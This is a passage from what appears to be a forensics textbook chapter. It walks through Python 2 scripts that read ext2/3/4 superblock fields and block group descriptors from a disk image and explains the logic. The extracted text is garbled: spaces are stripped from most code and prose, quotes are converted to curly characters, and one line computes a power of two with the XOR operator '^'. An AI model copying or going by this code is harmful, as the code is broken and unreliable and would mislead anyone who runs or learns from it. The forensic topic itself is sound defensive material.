self.defaultRegGid=getU16(data,0x52)
#forExt4dynamicrevisionLevelsuperblocksonly!
#firstnon-reservedinode
self.firstInode=getU32(data,0x54)
#inodesizeinbytes
self.inodeSize=getU16(data,0x58)
#blockgroupthissuperblockisin
self.blockGroupNumber=getU16(data,0x5a)
#compatiblefeatures
self.compatibleFeatures=getU32(data,0x5c)
self.compatibleFeaturesList=\
getCompatibleFeaturesList(self.compatibleFeatures)
#incompatiblefeatures
self.incompatibleFeatures=getU32(data,0x60)
self.incompatibleFeaturesList=\
getIncompatibleFeaturesList(self.incompatibleFeatures)
#read-onlycompatiblefeatures
self.readOnlyCompatibleFeatures=getU32(data,0x64)
self.readOnlyCompatibleFeaturesList=\
getReadonlyCompatibleFeaturesList(\
self.readOnlyCompatibleFeatures)
#UUIDforvolumeleftasapackedstring
self.uuid=getU128(data,0x68)
#volumename-likelyempty
self.volumeName=data[0x78:0x88].split(“\x00”)[0]
#directorywherelastmounted
self.lastMounted=data[0x88:0xc8].split(“\x00”)[0]
#usedwithcompression
self.algorithmUsageBitmap=getU32(data,0xc8)
#notusedinext4
self.preallocBlocks=getU8(data,0xcc)
#onlyusedwithDIR_PREALLOCfeature
self.preallocDirBlock=getU8(data,0xcd)
#blocksreservedforfutureexpansion
self.reservedGdtBlocks=getU16(data,0xce)
#UUIDofjournalsuperblock
self.journalUuid=getU128(data,0xd0)
#inodenumberofjournalfile
self.journalInode=getU32(data,0xe0)
#devicenumberforjournalifexternaljournalused
self.journalDev=getU32(data,0xe4)
#startoflistoforphanedinodestodelete
self.lastOrphan=getU32(data,0xe8)
self.hashSeed=[]
self.hashSeed.append(getU32(data,0xec))#htreehashseed
self.hashSeed.append(getU32(data,0xf0))
self.hashSeed.append(getU32(data,0xf4))
self.hashSeed.append(getU32(data,0xf8))
#0/1/2/3/4/5legacy/halfMD4/tea/u-legacy/u-halfMD4/u-Tea
self.hashVersion=getU8(data,0xfc)
self.journalBackupType=getU8(data,0xfd)
#groupdescriptorsizeif64-bitfeatureenabled
self.descriptorSize=getU16(data,0xfe)
self.defaultMountOptions=getU32(data,0x100)
#onlyusedwithmetabgfeature
self.firstMetaBlockGroup=getU32(data,0x104)
#whenwasthefilesystemcreated
self.mkfsTime=time.gmtime(getU32(data,0x108))
self.journalBlocks=[]
#backupcopyofjournalinodesandsizeinlasttwoelements
foriinrange(0,17):
self.journalBlocks.append(getU32(data,0x10c+i*4))
#for64-bitmodeonly
self.blockCountHi=getU32(data,0x150)
self.reservedBlockCountHi=getU32(data,0x154)
self.freeBlocksHi=getU32(data,0x158)
#allinodessuchhaveatleastthismuchspace
self.minInodeExtraSize=getU16(data,0x15c)
#newinodesshouldreservethismanybytes
self.wantInodeExtraSize=getU16(data,0x15e)
#1/2/4signedhash/unsignedhash/testcode
self.miscFlags=getU32(data,0x160)
#logicalblocksreadfromdiskinRAIDbeforemovingtonextdisk
self.raidStride=getU16(data,0x164)
#secondstowaitbetweenmulti-mountchecks
self.mmpInterval=getU16(data,0x166)
#blocknumberforMMPdata
self.mmpBlock=getU64(data,0x168)
#howmanyblocksread/writetillbackonthisdisk
self.raidStripeWidth=getU32(data,0x170)
#groupsperflexgroup
self.groupsPerFlex=2^(getU8(data,0x174))
#shouldbe1forcrc32
self.metadataChecksumType=getU8(data,0x175)
self.reservedPad=getU16(data,0x176)#shouldbezeroes
#kilobyteswrittenforalltime
self.kilobytesWritten=getU64(data,0x178)
#inodeofactivesnapshot
self.snapshotInode=getU32(data,0x180)
#idoftheactivesnapshot
self.snapshotId=getU32(data,0x184)
#blocksreservedforsnapshot
self.snapshotReservedBlocks=getU64(data,0x188)
#inodenumberofheadofsnapshotlist
self.snapshotList=getU32(data,0x190)
self.errorCount=getU32(data,0x194)
#timefirsterrordetected
self.firstErrorTime=time.gmtime(getU32(data,0x198))
self.firstErrorInode=getU32(data,0x19c)#guiltyinode
self.firstErrorBlock=getU64(data,0x1a0)#guiltyblock
#guiltyfunction
self.firstErrorFunction=data[0x1a8:0x1c8].split(“\x00”)[0]
#linenumberwhereerroroccurred
self.firstErrorLine=getU32(data,0x1c8)
#timelasterrordetected
self.lastErrorTime=time.gmtime(getU32(data,0x1cc))
self.lastErrorInode=getU32(data,0x1d0)#guiltyinode
#linenumberwhereerroroccurred
self.lastErrorLine=getU32(data,0x1d4)
self.lastErrorBlock=getU64(data,0x1d8)#guiltyblock
#guiltyfunction
self.lastErrorFunction=data[0x1e0:0x200].split(“\x00”)[0]
#mountoptionsinnull-terminatedstring
self.mountOptions=data[0x200:0x240].split(“\x00”)[0]
#inodeofuserquotafile
self.userQuotaInode=getU32(data,0x240)
#inodeofgroupquotafile
self.groupQuotaInode=getU32(data,0x244)
self.overheadBlocks=getU32(data,0x248)#shouldbezero
self.backupBlockGroups=[getU32(data,0x24c),\
getU32(data,0x250)]#supersparse2only
self.encryptionAlgorithms=[]
foriinrange(0,4):
self.encryptionAlgorithms.append(getU32(data,0x254+i*4))
self.checksum=getU32(data,0x3fc)
defprintState(self):
#0001/0002/0004=cleanlyunmounted/errors/orphans
retVal=“Unknown”
ifself.state==1:
retVal=“Cleanlyunmounted”
elifself.state==2:
retVal=“Errorsdetected”
elifself.state==4:
retVal=“Orphansbeingrecovered”
returnretVal
defprintErrorBehavior(self):
#whenerrors1/2/3continue/read-only/panic
retVal=“Unknown”
ifself.errors==1:
retVal=“Continue”
elifself.errors==2:
retVal=“Remountread-only”
elifself.errors==3:
retVal=“Kernelpanic”
returnretVal
defprintCreator(self):
#0/1/2/3/4Linux/Hurd/Masix/FreeBSD/Lites
retVal=“Unknown”
ifself.creatorOs==0:
retVal=“Linux”
elifself.creatorOs==1:
retVal=“Hurd”
elifself.creatorOs==2:
retVal=“Masix”
elifself.creatorOs==3:
retVal=“FreeBSD”
elifself.creatorOs==4:
retVal=“Lites”
returnretVal
defprintHashAlgorithm(self):
#0/1/2/3/4/5legacy/halfMD4/tea/u-legacy/u-halfMD4/u-Tea
retVal=“Unknown”
ifself.hashVersion==0:
retVal=“Legacy”
elifself.hashVersion==1:
retVal=“HalfMD4”
elifself.hashVersion==2:
retVal=“Tea”
elifself.hashVersion==3:
retVal=“UnsignedLegacy”
elifself.hashVersion==4:
retVal=“UnsignedHalfMD4”
elifself.hashVersion==5:
retVal=“UnsignedTea”
returnretVal
defprintEncryptionAlgorithms(self):
encList=[]
forvinself.encryptionAlgorithms:
ifv==1:
encList.append(‘256-bitAESinXTSmode’)
elifv==2:
encList.append(‘256-bitAESinGCMmode’)
elifv==3:
encList.append(‘256-bitAESinCBCmode’)
elifv==0:
pass
else:
encList.append(‘Unknown’)
returnencList
defprettyPrint(self):
fork,vinself.__dict__.iteritems():
ifk==‘mountTime’ork==‘writeTime’or\
k==‘lastCheck’ork==‘mkfsTime’or\
k==‘firstErrorTime’ork==‘lastErrorTime’:
printk+”:”,time.asctime(v)
elifk==‘state’:
printk+”:”,self.printState()
elifk==‘errors’:
printk+”:”,self.printErrorBehavior()
elifk==‘uuid’ork==‘journalUuid’:
printk+”:”,printUuid(v)
elifk==‘creatorOs’:
printk+”:”,self.printCreator()
elifk==‘hashVersion’:
printk+”:”,self.printHashAlgorithm()
elifk==‘encryptionAlgorithms’:
printk+”:”,self.printEncryptionAlgorithms()
else:
printk+”:”,v
defusage():
print(“usage“+sys.argv[0]+\
“<imagefile><offsetinsectors>\n”+\
“Readssuperblockfromanimagefile”)
exit(1)
defmain():
iflen(sys.argv)<3:
usage()
#readfirstsector
ifnotos.path.isfile(sys.argv[1]):
print(“File“+sys.argv[1]+\
“cannotbeopennedforreading”)
exit(1)
withopen(sys.argv[1],‘rb’)asf:
f.seek(1024+int(sys.argv[2])*512)
sbRaw=str(f.read(1024))
sb=Superblock(sbRaw)
sb.prettyPrint()
if__name__==“__main__”:
main()
Thisscriptbeginswiththeusualshe-banglinefollowedbyafewimportstatements.IthendefineafewhelperfunctionsgetU32,etc.thattakeapackedstringwithanoptionaloffsetandreturntheappropriatenumericalvalue.Allofthesefunctionsusestruct.unpack.Thesewerecreatedtomakethecodethatfollowsabitcleanerandeasiertoread.
Nextyouwill see theprintUuid functionwhichprints a16byteUUID in the correctformat.This is followedby three functionswhich return listsofstrings representing thecompatible, incompatible, and read-only compatible feature lists. These three functionsusethebitwiseANDoperator,&,totestiftheappropriatebitinoneofthefeaturebitmapsisset.
NextweseethedefinitionfortheSuperblockclass.LikeallproperPythonclasses,thisbegins with a constructor, which you will recall is named __init__ in Python. Theconstructorconsistsofalonglistofcallstothehelperfunctionsdefinedatthebeginningofthescript.Mostof thisconstructor isstraightforward.Afewof thelessobviouslinesarecommented.
Thereareanumberof timefields in thesuperblock.Allof these fieldsstore times insecondssince theepoch (January1,1970,atmidnight).Thesesecondsareconverted totimes by calling time.gmtime(<seconds since epoch>). For example,self.mountTime=time.gmtime(getU32(data,0x2c)) isusedtosetthemountTimevariableintheSuperblockclass.
Thesplitfunctionusedinthisfunctionisnew.Thesplitfunctionisusedtosplitastringonacharacterorsetofcharacters.Thesyntaxforsplitisstring.split(<string>[,<separators>[,<maxsplit]]).Iftheseparatorisnotspecified,thestringissplit on whitespace characters. Lines such as self.volumeName =data[0x78:0x88].split(“\x00”)[0] are used to split a string on a nullcharacter(“\x00”)andkeeponlyeverythingbeforethenullbyte.Thisisdonetopreventrandombytesafterthenullfromcorruptingourvalue.
Inafewcases,anemptylistiscreatedandthentheappendfunctionisusedtoadditemstothelist.Therearealsoafewsizesthatarestoredaspowersoftwo.Withtheexceptionsnotedabove,therearenonewtechniquesasyetundiscussedinthisbook.
TheSuperblockclassthendefinesafewfunctionsthatprintthefilesystemstate,errorbehavior, creator operating system, hash algorithm, and encryption algorithms in a userfriendlyway.TheSuperblockclassendswithaprettyPrintfunctionwhichisusedtoprintout all the information contained within a superblock object. This function uses adictionarywhichisimplicitlydefinedforallPythonobjects.
ForthosenewtoPython,adictionaryisessentiallyalistwithanimportantdifference.Insteadofusing integer indexesasakey toretrieving itemsfromthe list (thevalues),astringisusedas thekey.Whereemptysquarebracketsareusedtodefineanemptylist,emptycurlybracketsareusedtocreateanemptydictionary.Aswithlists,squarebracketsare used to retrieve items. Also, just like lists, items stored in a dictionarymay be ofdifferent types. It shouldbenoted that there is noorder to items in adictionary, so theorderinwhichitemsareaddedisirrelevant.
TheimplicitlydefineddictionaryPythoncreatesforeachobjectiscalled__dict__.Thekeysarethenamesofclassvariablesandthevaluesareofthesametypeaswhateverisstoredintheobject.Thelinefork,vinself.__dict__.iteritems():intheSuperblock.prettyPrintfunctiondemonstratesthesyntaxforcreatingafor loop thatiteratesoveradictionary.Theif/elif/elseblock inprettyPrint isused toprint theitemsthatarenotsimplestringsornumberscorrectly.
The script defines usage and main functions. The if __name__ ==“__main__”:main() at the end of the script allows it to be run or imported intoanother script. The main method opens the image file and then seeks to the proper
location. Recall that the superblock is 1024 bytes long and begins 1024 bytes into thefilesystem. Once the correct bytes have been read, they are passed to the Superblockconstructor on the line sb = Superblock(sbRaw) and then the fields of thesuperblockareprintedonthenextline,sb.prettyPrint().
PartialresultsfromrunningthisnewscriptagainstthePFEsubjectsystemareshowninFigure7.11.ExaminingFigure7.11youwillseethatthesubjectsystemhasthefollowingread-only compatible features: Sparse Super, Large File, Huge File, Group DescriptorTableChecksum,DirectoryNlink,andExtraIsize.UponcomparingthistoFigure7.3youwillseethatTheSleuthKitmissedtwofeatures:GroupDescriptorTableChecksumandDirectoryNlink! In order to continue building the full picture of howour filesystem isorganized,wemustreadtheblockgroupdescriptors.
FIGURE7.11
Partialoutputofscriptthatreadsuperblockinformation.
ReadingblockgroupdescriptorsTheblockgroupdescriptorsaremuchsimplerandsmallerthanthesuperblock.Recallthatthesegroupdescriptorsare32byteslong,unlessanext4filesystemisusing64-bitmode,inwhichcasetheyare64byteslong.ThefollowingcodedefinesaGroupDescriptorclass.AswiththeSuperblockclass,commentsthatwouldnormallybeattheendofalinehavebeenplacedabovethelinetomakethingsmorelegibleinthisbook.classGroupDescriptor():
def__init__(self,data,wide=False):
#/*Blocksbitmapblock*/
self.blockBitmapLo=getU32(data)
#/*Inodesbitmapblock*/
self.inodeBitmapLo=getU32(data,4)
#/*Inodestableblock*/
self.inodeTableLo=getU32(data,8)
#/*Freeblockscount*/
self.freeBlocksCountLo=getU16(data,0xc)
#/*Freeinodescount*/
self.freeInodesCountLo=getU16(data,0xe)
#/*Directoriescount*/
self.usedDirsCountLo=getU16(data,0x10)
#/*EXT4_BG_flags(INODE_UNINIT,etc)*/
self.flags=getU16(data,0x12)
self.flagsList=self.printFlagList()
#/*Excludebitmapforsnapshots*/
self.excludeBitmapLo=getU32(data,0x14)
#/*crc32c(s_uuid+grp_num+bbitmap)LE*/
self.blockBitmapCsumLo=getU16(data,0x18)
#/*crc32c(s_uuid+grp_num+ibitmap)LE*/
self.inodeBitmapCsumLo=getU16(data,0x1a)
#/*Unusedinodescount*/
self.itableUnusedLo=getU16(data,0x1c)
#/*crc16(sb_uuid+group+desc)*/
self.checksum=getU16(data,0x1e)
ifwide==True:
#/*BlocksbitmapblockMSB*/
self.blockBitmapHi=getU32(data,0x20)
#/*InodesbitmapblockMSB*/
self.inodeBitmapHi=getU32(data,0x24)
#/*InodestableblockMSB*/
self.inodeTableHi=getU32(data,0x28)
#/*FreeblockscountMSB*/
self.freeBlocksCountHi=getU16(data,0x2c)
#/*FreeinodescountMSB*/
self.freeInodesCountHi=getU16(data,0x2e)
#/*DirectoriescountMSB*/
self.usedDirsCountHi=getU16(data,0x30)
#/*UnusedinodescountMSB*/
self.itableUnusedHi=getU16(data,0x32)
#/*ExcludebitmapblockMSB*/
self.excludeBitmapHi=getU32(data,0x34)
#/*crc32c(s_uuid+grp_num+bbitmap)BE*/
self.blockBitmapCsumHi=getU16(data,0x38)
#/*crc32c(s_uuid+grp_num+ibitmap)BE*/
self.inodeBitmapCsumHi=getU16(data,0x3a)
self.reserved=getU32(data,0x3c)
defprintFlagList(self):
flagList=[]
#inodetableandbitmaparenotinitialized(EXT4_BG_INODE_UNINIT).
ifself.flags&0x1:
flagList.append(‘InodeUninitialized’)
#blockbitmapisnotinitialized(EXT4_BG_BLOCK_UNINIT).
ifself.flags&0x2:
flagList.append(‘BlockUninitialized’)
#inodetableiszeroed(EXT4_BG_INODE_ZEROED).
ifself.flags&0x4:
flagList.append(‘InodeZeroed’)
returnflagList
defprettyPrint(self):
fork,vinsorted(self.__dict__.iteritems()):
printk+”:”,v
Thisnewclassisstraightforward.Notethattheconstructortakesanoptionalparameterwhich is used to indicate if 64-bit mode is being used. GroupDescriptor defines aprettyPrintfunctionsimilartotheonefoundinSuperblock.
OnitsowntheGroupDescriptorclassisn’t terriblyuseful.Themainreasonfor this isthatdataisrequiredfromthesuperblocktolocate,read,andinterpretgroupdescriptors.Ihave created a new class called ExtMetadata (for extended metadata) that combinesinformation from the superblock and the block group descriptors in order to solve thisproblem.Thecodeforthisnewclassfollows.classExtMetadata():
def__init__(self,filename,offset):
#readfirstsector
ifnotos.path.isfile(sys.argv[1]):
print(“File“+str(filename)+“cannotbeopennedforreading”)
exit(1)
withopen(str(filename),‘rb’)asf:
f.seek(1024+int(offset)*512)
sbRaw=str(f.read(1024))
self.superblock=Superblock(sbRaw)
#readblockgroupdescriptors
self.blockGroups=self.superblock.blockGroups()
ifself.superblock.descriptorSize!=0:
self.wideBlockGroups=True
self.blockGroupDescriptorSize=64
else:
self.wideBlockGroups=False
self.blockGroupDescriptorSize=32
#readingroupdescriptorsstartinginblock1
withopen(str(filename),‘rb’)asf:
f.seek(int(offset)*512+self.superblock.blockSize)
bgdRaw=str(f.read(self.blockGroups*\
self.blockGroupDescriptorSize))
self.bgdList=[]
foriinrange(0,self.blockGroups):
bgd=GroupDescriptor(bgdRaw[i*self.blockGroupDescriptorSize:],\
self.wideBlockGroups)
self.bgdList.append(bgd)
defprettyPrint(self):
self.superblock.prettyPrint()
i=0
forbgdinself.bgdList:
print“Blockgroup:”+str(i)
bgd.prettyPrint()
print“”
i+=1
Theconstructorforthisclassnowcontainsthecodefrommain()inourpreviousscriptthatisusedtoreadthesuperblockfromthediskimagefile.Thereasonforthisisthatweneedthesuperblockinformationinordertoknowhowmuchdatatoreadwhenretrievingthegroupdescriptorsfromtheimagefile.
The constructor first reads the superblock, then creates a Superblock object, uses theinformationfromthesuperblocktocalculatethesizeofthegroupdescriptortable,readsthegroupdescriptortableandpassesthedatatotheGroupDescriptorconstructorinordertobuildalistofGroupDescriptorobjects(insidetheforloop).
Thenewmain()functionbelowhasbecomeverysimple.Itjustchecksfortheexistenceof the image file, calls the ExtMetadata constructor, and then uses theExtMetadata.prettyPrintfunctiontoprinttheresults.defusage():
print(“usage“+sys.argv[0]+\
“<imagefile><offsetinsectors>\n”+\
“Readssuperblock&groupdescriptorsfromanimagefile”)
exit(1)
defmain():
iflen(sys.argv)<3:
usage()
#readfirstsector
ifnotos.path.isfile(sys.argv[1]):
print(“File“+sys.argv[1]+“cannotbeopennedforreading”)
exit(1)
emd=ExtMetadata(sys.argv[1],sys.argv[2])
emd.prettyPrint()
if__name__==“__main__”:
main()
PartialoutputforthisnewscriptisshowninFigure7.12.AtthispointourExtMetadataclassisverybasic.Wewillexpandthisclassinthenextsection.
FIGURE7.12
Partialoutputfromascriptthatparsestheblockgroupdescriptortable.
CombiningsuperblockandgroupdescriptorinformationUpuntilthispointwehavetreatedthesuperblockandgroupdescriptorsseparately.Inthelastsectionweusedtheinformationfromthesuperblocktolocatethegroupdescriptors,but thatwastheextent towhichwecombinedinformationfromthesetwoitems.Inthissectionwewill extend the classes introduced previously in this chapter and add a newclasswhichwillallowustodeterminethelayoutofanextendedfilesystem.Wewillstartatthebeginningofthescriptandworkourwaytowardtheenddescribinganythingthatisneworchanged.Notethatunlikemostscriptsinthisbook,Iwilltalkaboutthechanges
and present the complete script at the end of this section. Given the large number ofchanges,thisseemstomakemoresenseforthisscript.
The first change is a new import statement,frommathimportlog, is added.Thisisadifferentformofimportfromwhathasbeenusedthusfar.Thisimportonlypullsinpartofthemathmodule.Thelogfunctionwillbeusedinsomeofthenewcodeinthescript.
A number of new functions have been added. Two convenience functions fordeterminingthenumberofblockgroupsandthegroupdescriptorsizeareamongthenewfunctions.Theircodefollows.defblockGroups(self):
bg=self.totalBlocks/self.blocksPerGroup
ifself.totalBlocks%self.blocksPerGroup!=0:
bg+=1
returnbg
defgroupDescriptorSize(self):
if‘64-bit’inself.incompatibleFeaturesList:
return64
else:
return32
The blockGroups function divides the total blocks by blocks-per-group using integerdivision.Integerdivisioniswhatyoulearnedbackingrammarschoolwheretheanswerwasalwaysanintegerwithpossiblyaremainderifthingsdidn’tdivideevenly.Thenextlineuses themodulus (%)operator.Themodulus is the remainderyouget from integerdivision.Forexample,7%3 is1because7 /3using integerdivision is2remainder1.Thelineifself.totalBlocks%self.blocksPerGroup!=0:effectivelysays“ifthetotalnumberofblocksisnotamultipleoftheblockspergroup,addonetothenumberofblockgroupstoaccountforthelast(smaller)blockgroup.”
ThefollowingnewconveniencefunctionsfortheSuperblockclassarestraightforward.They are used to determine one quantity from another, such as getting the block groupnumberfromaninodeordatablocknumber,etc.defgroupStartBlock(self,bgNo):
returnself.blocksPerGroup*bgNo
defgroupEndBlock(self,bgNo):
returnself.groupStartBlock(bgNo+1)-1
defgroupStartInode(self,bgNo):
returnself.inodesPerGroup*bgNo+1
defgroupEndInode(self,bgNo):
returnself.inodesPerGroup*(bgNo+1)
defgroupFromBlock(self,blockNo):
returnblockNo/self.blocksPerGroup
defgroupIndexFromBlock(self,blockNo):
returnblockNo%self.blocksPerGroup
defgroupFromInode(self,inodeNo):
return(inodeNo-1)/self.inodesPerGroup
defgroupIndexFromInode(self,inodeNo):
return(inodeNo-1)%self.inodesPerGroup
Thefinaladdition to theSuperblockclass is the functiongroupHasSuperblock. Ifyoupassthisfunctionablockgroupnumberitwilltellyou(okay,notliterallytellyou,butitwillreturnavalue)ifthatblockgroupcontainsasuperblockbasedonthefeaturesinuse.Thecodeforthisfunctionfollows.defgroupHasSuperblock(self,bgNo):
#blockgroupzeroalwayshasasuperblock
ifbgNo==0:
returnTrue
retVal=False
if‘MetaBlockGroups’inself.incompatibleFeaturesListand\
bgNo>=self.firstMetaBlockGroup:
#metablockgroupshaveasbandgdtin1stand
#2ndandlastofeachmetagroup
#metablockgroupsizeisblocksize/32
#onlypartoffilesystemmightusethisfeature
mbgSize=self.blockSize/32
retVal=(bgNo%mbgSize==0)or\
((bgNo+1)%mbgSize==0)or\
((bgNo-1)%mbgSize==0)
elif‘SparseSuper2’inself.compatibleFeaturesList:
#twobackupsuperblocksinself.backupBlockGroups
ifbgNo==self.backupBlockGroups[0]or\
bgNo==self.backupBlockGroups[1]:
retVal=True
elif‘SparseSuper’inself.readOnlyCompatibleFeaturesList:
#backupsin1,powersof3,5,and7
retVal=(bgNo==1)or\
(bgNo==pow(3,round(log(bgNo)/log(3))))\
or(bgNo==pow(5,round(log(bgNo)/log(5))))\
or(bgNo==pow(7,round(log(bgNo)/log(7))))
ifretVal:
returnretVal
else:
#ifwegotthisfarwemusthavedefault
#witheverybghavingsbandgdt
retVal=True
returnretVal
Thisfunctionisprimarilyabigif/elif/elseblock.Itbeginswithachecktoseewhethertheblockgroupnumberiszero.Ifso,itimmediatelyreturnsTruebecausethereisalwaysasuperblockinthefirstgroup.
NextwecheckfortheMetaBlockGroupsfeature.Recallthatthisfeaturebreaksupthefilesystemintometagroups.Themetagroupsarelikelittlelogicalfilesystemsinthatthegroupdescriptorsonlypertaintoblockgroupswithinthemetagroup.Thisallowslargerfilesystems tobecreated.When this feature isenabled, there isa superblockandgroupdescriptortableinthefirst,secondandlastblockgroupswithinthemetagroup.Themetagroupsalwayshaveasizeofblocksize/32.Also,themetablockgroupmayonlyapplytopartofthedisk,soacheckismadetoensurethatweareintheregionwheremetagroupsexist.
Next,wecheckfortheSparseSuper2feature.Thisfeaturestoresbackupsuperblocksintwogroupslistedinthesuperblock.ThenextcheckisfortheSparseSuperfeature.Ifthisfeatureisinuse,thebackupsuperblocksareingroup1andgroupsthatarepowersof3,5,or7.This iswhere the logarithmfunction importedearliercomes in.Foranynumbernthatisanevenpowerofx,xrounded(log(n)/log(x))shouldequaln.
The GroupDescriptor class is unchanged. We add a new class,ExtendedGroupDescriptor,whichcombines informationfromoursuperblockwithgroupdescriptorstomorefullydescribetheblockgroup.ThisnewclassaddslayoutinformationtowhatisfoundinthegenericGroupDescriptorclass.SomemightquestionwhyIchosenot to have the ExtendedGroupDescriptor class inherit from (or extend) theGroupDescriptor class. The primary reason I did not do so is that theGroupDescriptorclass is littlemore than a structure for storing rawdata found on the disk,whereas theExtendedGroupDescriptorhasmoremeaningfuldatamembers that arederived from therawvalues.Thecodeforthisnewclassfollows.classExtendedGroupDescriptor():
def__init__(self,bgd,sb,bgNo):
self.blockGroup=bgNo
self.startBlock=sb.groupStartBlock(bgNo)
self.endBlock=sb.groupEndBlock(bgNo)
self.startInode=sb.groupStartInode(bgNo)
self.endInode=sb.groupEndInode(bgNo)
self.flags=bgd.printFlagList()
self.freeInodes=bgd.freeInodesCountLo
ifbgd.wide:
self.freeInodes+=bgd.freeInodesCountHi*pow(2,16)
self.freeBlocks=bgd.freeBlocksCountLo
ifbgd.wide:
self.freeBlocks+=bgd.freeBlocksCountHi*pow(2,16)
self.directories=bgd.usedDirsCountLo
ifbgd.wide:
self.directories+=bgd.usedDirsCountHi*pow(2,16)
self.checksum=bgd.checksum
self.blockBitmapChecksum=bgd.blockBitmapCsumLo
ifbgd.wide:
self.blockBitmapChecksum+=bgd.blockBitmapCsumHi*pow(2,16)
self.inodeBitmapChecksum=bgd.inodeBitmapCsumLo
ifbgd.wide:
self.inodeBitmapChecksum+=bgd.inodeBitmapCsumHi*pow(2,16)
#nowfigureoutthelayoutandstoreitinalist(withlistsinside)
self.layout=[]
self.nonDataBlocks=0
#forflexibleblockgroupsmustmakeanadjustment
fbgAdj=1
if‘FlexibleBlockGroups’insb.incompatibleFeaturesList:
#onlyfirstgroupinflexblockaffected
ifbgNo%sb.groupsPerFlex==0:
fbgAdj=sb.groupsPerFlex
ifsb.groupHasSuperblock(bgNo):
self.layout.append([‘Superblock’,self.startBlock,\
self.startBlock])
gdSize=sb.groupDescriptorSize()*sb.blockGroups()/
sb.blockSize
self.layout.append([‘GroupDescriptorTable’,\
self.startBlock+1,self.startBlock+gdSize])
self.nonDataBlocks+=gdSize+1
ifsb.reservedGdtBlocks>0:
self.layout.append([‘ReservedGDTBlocks’,\
self.startBlock+gdSize+1,\
self.startBlock+gdSize+sb.reservedGdtBlocks])
self.nonDataBlocks+=sb.reservedGdtBlocks
bbm=bgd.blockBitmapLo
ifbgd.wide:
bbm+=bgd.blockBitmapHi*pow(2,32)
self.layout.append([‘DataBlockBitmap’,bbm,bbm])
#isblockbitmapinthisgroup(notflexblockgroup,etc)
ifsb.groupFromBlock(bbm)==bgNo:
self.nonDataBlocks+=fbgAdj
ibm=bgd.inodeBitmapLo
ifbgd.wide:
ibm+=bgd.inodeBitmapHi*pow(2,32)
self.layout.append([‘InodeBitmap’,ibm,ibm])
#isinodebitmapinthisgroup?
ifsb.groupFromBlock(ibm)==bgNo:
self.nonDataBlocks+=fbgAdj
it=bgd.inodeTableLo
ifbgd.wide:
it+=bgd.inodeTableHi*pow(2,32)
itBlocks=(sb.inodesPerGroup*sb.inodeSize)/sb.blockSize
self.layout.append([‘InodeTable’,it,it+itBlocks-1])
#isinodetableinthisgroup?
ifsb.groupFromBlock(it)==bgNo:
self.nonDataBlocks+=itBlocks*fbgAdj
self.layout.append([‘DataBlocks’,self.startBlock\
+self.nonDataBlocks,self.endBlock])
defprettyPrint(self):
print“”
print‘BlockGroup:‘+str(self.blockGroup)
print‘Flags:%r‘%self.flags
print‘Blocks:%s-%s‘%(self.startBlock,self.endBlock)
print‘Inodes:%s-%s‘%(self.startInode,self.endInode)
print‘Layout:’
foriteminself.layout:
print‘%s%s-%s’%(item[0],item[1],item[2])
print‘FreeInodes:%u‘%self.freeInodes
print‘FreeBlocks:%u‘%self.freeBlocks
print‘Directories:%u‘%self.directories
print‘Checksum:0x%x‘%self.checksum
print‘BlockBitmapChecksum:0x%x‘%self.blockBitmapChecksum
print‘InodeBitmapChecksum:0x%x‘%self.inodeBitmapChecksum
Thereareafewthingsintheconstructorthatmightrequiresomeexplanation.Youwillsee lines that readifbgd.wide: followinganassignment,where if the statement istrue (wideor64-bitmode inuse),anothervaluemultipliedby216or232 isadded to thenewly assigned value. This allows the raw values stored in two fields of the groupdescriptorsfor64-bitfilesystemstobestoredproperlyinasinglevalue.
Recall thatwhile certain blockgroupsmaybemissing some items, the itemorder ofwhat is present is always superblock, group descriptor table, reserved group descriptorblocks,datablockbitmap, inodebitmap, inodetable,anddatablocks.Beforebuildinga
listcalledlayoutwhichisalistoflistscontainingadescriptor,startblock,andendblock,theconstructorchecksfortheFlexibleBlockGroupsfeature.
Asareminder,thisfeatureallowsthemetadatafromaflexiblegrouptobestoredinthefirstblockgroupwithintheflexgroup.Becausethefirstblockgroupstoresallthegroupdescriptors,bitmaps,andinodesfortheentireflexgroup,anadjustmentfactor,fbgAdj,issettothenumberofgroupsinaflexgroupinordertoaddthecorrectnumberofblockstothe layout of the block group. Themodulus (%) operator is used in this constructor todeterminewhetherweareatthebeginningofaflexiblegroup.Onceyouunderstandtheflexibleblockgroupadjustmentcalculation,theconstructorbecomeseasytounderstand.
The prettyPrint function in the ExtendedGroupDescriptor class is straightforward.Asmentionedearlierinthisbook,TheSleuthKitseemstobeabitoutofdate.Wehaveseenfeaturesthatitdoesnotreport.Italsowillnotreportthetwobitmapchecksumsattheendof the prettyPrint function in the ExtendedGroupDescriptor class. The only remainingchange to our script is to modify the ExtMetadata class to storeExtendedGroupDescriptors instead ofGroupDescriptors. The final version of this scriptfollows.#!/usr/bin/python
#
#extfs.py
#
#ThisisasimplePythonscriptthatwill
#getmetadatafromanext2/3/4filesysteminside
#ofanimagefile.
#
#DevelopedforPentesterAcademy
#byDr.PhilPolstra(@ppolstra)
importsys
importos.path
importsubprocess
importstruct
importtime
frommathimportlog
#thesearesimplefunctionstomakeconversionseasier
defgetU32(data,offset=0):
returnstruct.unpack(‘<L’,data[offset:offset+4])[0]
defgetU16(data,offset=0):
returnstruct.unpack(‘<H’,data[offset:offset+2])[0]
defgetU8(data,offset=0):
returnstruct.unpack(‘B’,data[offset:offset+1])[0]
defgetU64(data,offset=0):
returnstruct.unpack(‘<Q’,data[offset:offset+8])[0]
#thisfunctiondoesn’tunpackthestringbecause
#itisn’treallyanumberbutaUUID
defgetU128(data,offset=0):
returndata[offset:offset+16]
defprintUuid(data):
retStr=format(struct.unpack(‘<Q’,data[8:16])[0],\
‘X’).zfill(16)+\
format(struct.unpack(‘<Q’,data[0:8])[0],‘X’).zfill(16)
returnretStr
defgetCompatibleFeaturesList(u32):
retList=[]
ifu32&0x1:
retList.append(‘DirectoryPreallocate’)
ifu32&0x2:
retList.append(‘ImagicInodes’)
ifu32&0x4:
retList.append(‘HasJournal’)
ifu32&0x8:
retList.append(‘ExtendedAttributes’)
ifu32&0x10:
retList.append(‘ResizeInode’)
ifu32&0x20:
retList.append(‘DirectoryIndex’)
ifu32&0x40:
retList.append(‘LazyBlockGroups’)
ifu32&0x80:
retList.append(‘ExcludeInode’)
ifu32&0x100:
retList.append(‘ExcludeBitmap’)
ifu32&0x200:
retList.append(‘SparseSuper2’)
returnretList
defgetIncompatibleFeaturesList(u32):
retList=[]
ifu32&0x1:
retList.append(‘Compression’)
ifu32&0x2:
retList.append(‘Filetype’)
ifu32&0x4:
retList.append(‘Recover’)
ifu32&0x8:
retList.append(‘JournalDevice’)
